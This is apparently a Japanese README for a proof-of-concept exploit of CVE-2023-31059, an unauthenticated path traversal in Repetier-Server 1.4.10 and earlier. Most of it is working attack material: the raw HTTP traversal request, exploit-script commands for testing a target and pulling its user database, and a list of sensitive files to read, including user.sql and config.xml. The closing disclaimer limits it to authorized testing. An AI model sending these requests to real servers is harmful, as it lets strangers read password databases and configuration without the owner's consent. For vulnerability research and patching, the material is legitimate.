
CVE-2023-31059の概念実証エクスプロイト。Repetier-Server ≤1.4.10の認証なしパストラバーサルで、細工されたHTTPリクエストによる任意ファイル読み取りを可能にします。
| フィールド | 値 |
|---|
| 製品 | Repetier‑Server |
| 影響を受けるバージョン | ≤ 1.4.10 |
| CVE | CVE‑2023‑31059 |
| タイプ | パストラバーサル / LFI |
| 認証 | 不要 |
| 攻撃ベクトル | ネットワーク |
| 影響 | 任意ファイル読み取り |
| CVSS | 9.8 Critical |
flowchart LR
A[Attacker] -->|HTTP request with ..%5c traversal| B[Repetier Server]
B --> C[base/connectionLost.php]
C -->|Unsanitized file parameter| D[Windows Filesystem]
D --> E[Sensitive File]
E --> B
B -->|File contents in HTTP response| AGET /base/connectionLost.php?file=..%5c..%5cWindows%5cwin.ini HTTP/1.1
Host: target:3344
# Test vulnerability
python3 CVE-2023-31059.py http://<target-ip>:3344/ --test
# Extract user database
python3 CVE-2023-31059.py http://<target-ip>:3344/ \
--file "ProgramData\\Repetier-Server\\database\\user.sql" \
--depth 20
pip install requests
ProgramData\Repetier-Server\database\user.sql
ProgramData\Repetier-Server\config.xml
Windows\win.ini
Windows\System32\drivers\etc\hosts
この PoC は、教育および許可されたセキュリティテストの目的のみで提供されます。 テストは、自身が所有するシステム、または明示的なテスト許可を得たシステムに対してのみ実施してください。
GitHub: https://github.com/mbanyamer